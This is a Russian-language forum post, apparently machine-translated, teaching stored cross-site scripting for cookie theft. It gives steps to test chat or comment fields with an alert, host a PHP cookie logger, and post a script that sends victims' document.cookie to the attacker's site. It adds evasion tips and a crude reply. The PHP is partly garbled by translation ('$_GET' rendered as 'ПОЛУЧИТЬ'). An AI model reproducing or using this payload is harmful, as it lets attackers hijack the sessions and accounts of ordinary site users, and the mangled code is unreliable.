Межсайтовый скриптинг

[Dragon]

метод

Перенаправляет вас по ссылке с помощью команд javascript и предоставляет вам файлы cookie пользователя.





Ну а теперь перейдем к Кармону. (Только на сайтах, на которых есть xss bugs)

Шаг 1

Например, есть чат, где вы видите сообщение, вы отправляете этот текст вместо сообщения: ‌

<script> alert ('Ошибка') </script>

Если при входе на страницу отображается ошибка (например, предупреждение), это означает, что на сайте есть ошибка.



Шаг 2:

Создайте файл с именем xss.php на своем сайте и поместите в него этот php-код:

<? php
$ cookie = $ _ ПОЛУЧИТЬ ['c'];
$ fo = fopen ('cookie.html', 'а');
fwrite ($ fo, 'Cookie:'. $ cookie. '<br> <br> <br> --------------------------- ------------ <br> <br> <br> ');
fclose ($ fo);
?>

Шаг 3:

Отправьте еще одно сообщение в поле сообщения с этим кодом javascript:

<script> document.location = "http://site.com/xss.php?c=" + document.cookie </script>

Или

<script> document.location = "http://site.com/xss.php?c="% 2bdocument.cookie </script>

Вместо site.com укажите адрес вашего сайта, на котором вы разместили файл xss.php.





Шаг 4:

Введите этот адрес:

http://site.com/cookie.html

И когда пользователи увидят ваше сообщение, они будут перенаправлены на site.com/xss.php и их файлы cookie в файле.

Он будет сохранен для вас как cookie.html.







Важные моменты при этом:

1- Никогда не создавайте файлы на своем сайте, потому что, если кто-то заметит, он будет жаловаться на ваш сайт и ....

2- Никогда не делайте этого на иранских сайтах.

3- Эта ошибка может быть в разных местах сайта, например, в поле поиска, в разделе комментариев и т. Д.

4- Есть много способов использовать эту ошибку.

 

[evirain]

А почему на иранских то нельзя. Они ж там не помймут че за хуйню из отправили